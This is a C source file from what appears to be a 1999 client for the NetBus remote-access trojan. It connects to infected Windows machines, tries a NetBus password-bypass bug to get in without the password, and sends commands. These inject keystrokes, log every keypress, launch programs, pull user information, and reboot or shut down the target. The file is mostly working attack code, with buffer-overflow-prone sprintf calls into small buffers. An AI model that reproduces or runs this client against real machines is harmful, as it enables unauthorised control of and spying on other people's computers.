/*

    commands.c - guess
    
    Copyright (C) 1999 David Tuvin

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

*/

#include "nil.h"
#include "socket.h"
#include "commands.h"
#include "alias.h"

extern STATUS *status;

void show_help (void)
{ 
printf (

"                                                                        \n"
"%s-- Program-related ------------------------------------------%s       \n"
"                                                                        \n"
"   %sconnect%s         %sHOST%s        %sconnect to computer%s          \n"
"   %sdisconnect%s                  %sclose connection%s                 \n"
"   %sshow_aliases%s                %sshow loaded aliases%s              \n"
"   %sstatus%s                      %sshow current status%s              \n"  
"   %shelp%s                        %sshow this help%s                   \n"
"   %sversion%s                     %sshow client's version%s            \n"
"   %squit%s                        %sexit program%s                     \n"
"                                                                        \n"
"%s-- Server Admin ---------------------------------------------%s       \n"
"                                                                        \n"
"   %spassword%s        %sPWD%s         %schange password on server%s    \n"
"   %sclose_server%s                %sclose server%s                     \n"
"   %sremove_server%s               %sremove server from computer%s      \n"
"                                                                        \n"
"%s-- Close Windows --------------------------------------------%s       \n"
"                                                                        \n"
"   %sexit_win%s                    %sexit windows%s                     \n"
"   %spower_off%s                   %spower off%s                        \n"
"   %sreboot%s                      %sreboot computer%s                  \n"
"   %sshutdown%s                    %sshutdown computer%s                \n"
"                                                                        \n"
"%s-- Key Control ----------------------------------------------%s       \n"
"                                                                        \n"
"   %ssend_keys%s       %sKEYS%s        %ssend keys to active program%s  \n"
"   %skey_beep%s        %s1/0%s         %sbeep on keypress%s             \n"
"   %sdisable_keys%s    %sKEYS%s        %sdisable keys%s                 \n"
"                                                                        \n"
"%s-- Misc -----------------------------------------------------%s       \n"
"                                                                        \n"
"   %seject%s           %s1/0%s         %seject/reject CD-ROM%s          \n"
"   %sshow_image%s      %sPATH%s        %sshow image%s                   \n"
"   %sremove_image%s                %sremove image%s                     \n"
"   %sswap_mouse%s      %s1/0%s         %sswap mouse buttons%s           \n"
"   %sstart_app%s       %sPATH%s        %sstart program%s                \n"
"   %sget_info%s                    %sget users info%s                   \n"
"   %splay_sound%s      %sPATH%s        %splay sound%s                   \n"
"   %smouse_pos%s       %sX Y%s         %sset mouse position%s           \n"
"   %slisten%s          %s1/0%s         %slisten for every keypress%s    \n"
"   %surl%s             %sURL%s         %sgoto url%s                     \n"
"                                                                        \n",

C_MSC, C_N,

/* program related */
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,

C_MSC, C_N,

/* server admin */
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,

C_MSC, C_N,

/* close windows */
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,

C_MSC, C_N,

/* key control */
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,

C_MSC, C_N,

/* misc */ 
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N,
C_CMD,C_N,C_ARG,C_N,C_MSC, C_N);
}

void msg (char *msg)
{
   printf ("%s%s%s\n", C_MSG, msg, C_N);
}

int cmd (char *string)
{
   int val;
   
   val = write_socket(string);
      
   if (val < 0)
      msg ("Unable to send");
      
   return 0;
}

void connect_ (char *host)
{
   char buffer[128];
   char s1[10], s2[10], s3[10];
   char error[32];			/* error string */
   char string[32];
   char pwd[32];
   int exploit = 0;
   
   /* create socket */
   if (create_socket() < 0)
   {
      printf ("Could not create socket\n");
      return;
   }
   
   if (try_connect(host) < 0)
   {
      switch (errno)
      {
         case EBADF:
            sprintf (error,"bad descriptor");
            break;
         case EFAULT:
            sprintf (error,"socket outside address space");
            break;
         case ENOTSOCK:
            sprintf (error, "descriptor not associated with socket");
            break;
         case EISCONN:
            sprintf (error, "socket already connected");
            break;
         case ECONNREFUSED:
            sprintf (error, "connection refused");
            break;
         case ETIMEDOUT:
            sprintf (error, "connection timed out");
            break;
         case ENETUNREACH:
            sprintf (error, "network unreachable");
            break;
         default:
            sprintf (error, "error %d", errno);
      }

      sprintf (string, "Connection failed (%s)", error);
      msg (string);
   }
   else
   {
      /* get string sent from server */
      while (read_socket(buffer, 128) < 0) {}
      sscanf (buffer, "%s %s %s", s1, s2, s3);
      
      /* make sure it's netbus */
      if (strcmp(s1, "NetBus") != 0)
      {
         printf ("Server not Netbus\n");
         return;
      }
      
      /* check for password protection */
      else if (strcmp(s3, "x") == 0)
      {
         msg ("Server is password protected");
         
         /* try to exploit the bug in some servers */
         
         msg ("Trying to exploit password bug...");

         /* send some shit, otherwise it doesn't work */
         /* hmm. don't ask me why.. :) */
         
         sprintf (string, "netbus is so fucking lame%c%c", 13, '\0');
         
         if (write_socket(string) < 0)
         {
            msg ("Unable to send on socket");
            return;
         }
         
         while (read_socket(buffer, 128) < 0) {}
         sprintf(string, "Password;1%c%c", 13, '\0');
          
         if (write_socket(string) < 0)
         {
            msg ("Unable to send on socket");
            return;
         }
         
         while (read_socket(buffer, 128) < 0) {}
         
         buffer [8] = '\0';
         
         if (strcmp(buffer, "Access;1") == 0)
            status->connected = 1;
         else
         {
            msg ("Failed");
            status->connected = 0;
         }
         
         if (!status->connected)
         {
            printf ("Enter password: ");
            scanf ("%s", &pwd);
      
            sprintf (string, "Password;0;%s%c%c", pwd, 13, '\0');
         
            if (write_socket(string) < 0)
            {
               msg ("Unable to send on socket");
               return;
            }
      
            while (read_socket(buffer, 128) < 0) {}
         
            /* verify string; Access;1 or Access;0 */
         
            buffer[8] = '\0';
         
            if (strcmp(buffer, "Access;1") == 0)
               status->connected = 1;
            else
            {
               msg ("Access denied");
               status->connected = 0;
            }
         }
         else
            status->connected = 1;
      } /* password protection */
      else
         status->connected = 1;
      
      if (status->connected)
      {
         sprintf (string, "Connected (version %s)", s2);
         msg (string);
         status->host = (char *)malloc(strlen(host));
         strcpy(status->host, host);
      }
   } /* connect */
}

void disconnect (void)
{
   if (status->connected)
   {
      close_socket ();
   
      msg ("Connection closed");
   
      if (!create_socket())
         msg ("Unable to create socket");
   
      status->connected = 0;
      status->listen = 0;
   }
   else
      msg ("Not connected");
}

void show_aliases (ALIAS *aliases)
{
   int i;
   char string[256];
   
   #ifdef USE_ALIASES
   
   if (!aliases)
   {
      msg ("No aliases loaded");
      return;
   }
   
   for (i=0; i<aliases->num_aliases; i++)
   {
       sprintf(string, "%s	%s", aliases->aliases[i].alias,
       aliases->aliases[i].command);
       msg (string);
   }

   #else
   
   msg ("Aliases not supported");
   
   #endif
}

void show_status (void)
{
   /* print current status */
   
   char string[32];
   
   if (status->connected)
   {
      sprintf (string, "Connected to %s", status->host);
      msg (string);
   }
   else
   {
      msg ("Not connected");
      return;
   }
   
   if (status->listen)
      msg ("Listening: yes");
   else
      msg ("Listening: no");
}

void show_version (void)
{
   char string[32];
   
   sprintf (string, "NIL %s", VERSION);
   msg (string);
}

void quit (void)
{
   int val;
   
   if (status->listen)
      listen_ ("0");
      
   close_socket ();
   
   done = 1;
}

/*
/* server admin
/*
/**********************/

void password (char *password)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ServerPwd;%s%c%c", password, 13, '\0');

   cmd (string);
}

void close_server (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
                     
   sprintf (string, "RemoveServer;0%c%c", 13, '\0');

   cmd (string);
}

void remove_server (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "RemoveServer;0%c%c", 13, '\0');
   
   cmd (string);
}

/*
/* close windows
/*
/**********************/

void exit_win (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ExitWin;1%c%c", 13, '\0');
   
   cmd (string);
}

void power_off (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ExitWin;2%c%c", 13, '\0');
   
   cmd (string);
}

void reboot_ (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ExitWin;3%c%c", 13, '\0');
   
   cmd (string);
}

void shutdown_ (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ExitWin;4%c%c", 13, '\0');
   
   cmd (string);
}

/*
/* key control
/*
/**********************/

void send_keys (char *keys)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "SendKeys;%s%c%c", keys, 13, '\0');
   
   cmd (string);
}
   
void key_beep (char *flag)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   if ((atoi(flag) != 0 && atoi(flag) != 1) || strlen(flag) != 1)
      msg ("bad argument");
          
   sprintf (string, "KeyClick;%d%c%c", atoi(flag), 13, '\0');
   
   cmd (string);
}

void disable_keys (char *keys)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "DisableKeys;%d%c%c", keys, 13, '\0');
   
   cmd (string);
}

/*
/* misc commands
/*
/**********************/

void eject (char *flag)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   if ((atoi(flag) != 0 && atoi(flag) != 1) || strlen(flag) != 1)
      msg ("Bad argument");
          
   sprintf (string, "Eject;%d%c%c", atoi(flag), 13, '\0');
   
   cmd (string);
}

void show_image (char *path)
{
   char *string = (char *)malloc(11+strlen(path));
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ShowImage;%s%c%c", path, 13, '\0');

   cmd (string);
}

void remove_image (void)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "ShowImage;%c%c", 13, '\0');

   cmd (string);
}

void swap_mouse (char *flag)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   /*if (flag == 0 || flag == 1)
   {
      sprintf (string, "SwapButton;%d%c%c", flag, 13, '\0');
      cmd (string);
   }
   else
      printf ("Bad/missing argument\n");*/
      
}

void start_app (char *path)
{
   char *string = (char *)malloc(11+strlen(path));
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "StartApp;%s%c%c", path, 13, '\0');

   cmd (string);
}

void get_info (void)
{
   int i;
   char string[32];
   char *buffer = (char *)malloc(128);
   char path[64];
   char restart[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "GetInfo%c%c", 13, '\0');

   if (cmd (string) < 0)
      return;
      
   /* receive info */
   while (read_socket(buffer, 128) < 0) {}
   
   if (!(buffer[0] == 'I' && buffer[1] == 'n' && buffer[2] == 'f' &&
   buffer[3] == 'o' && buffer[4] == ';'))
      msg ("Server did not send info string");
   
   strncpy (buffer, &buffer[5], strlen(buffer));
   
   /* change all '|' to '\n' */
   for (i=0; i<strlen(buffer); i++)
      if (buffer[i] == '|')
         buffer[i] = '\n';
         
   msg (buffer);
}

void play_sound (char *path)
{
   char *string = (char *)malloc(11+strlen(path));
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "PlaySound;%s%c%c", path, 13, '\0');

   cmd (string);
}

void mouse_pos (char *x, char *y)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
                     
   if (strlen(x) != 1 || strlen(y) != 1)
      msg ("bad argument");
   
   sprintf (string, "SetMousePos;%d;%d%c%c", atoi(x), atoi(y), 13, '\0');

   cmd (string);
}

void listen_ (char *flag)
{
   char string[32];
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   if ((atoi(flag) != 0 && atoi(flag) != 1) || strlen(flag) != 1)
      msg ("bad argument");
      
   sprintf (string, "Listen;%d%c%c", atoi(string), 13, '\0');

   status->listen = 1;
}

void url (char *url)
{
   char *string = (char *)malloc(11+strlen(url));
   
   if (!status->connected)
   {
      msg ("Not connected");
      return;
   }
   
   sprintf (string, "URL;%s%c%c", url, 13, '\0');

   cmd (string);
}
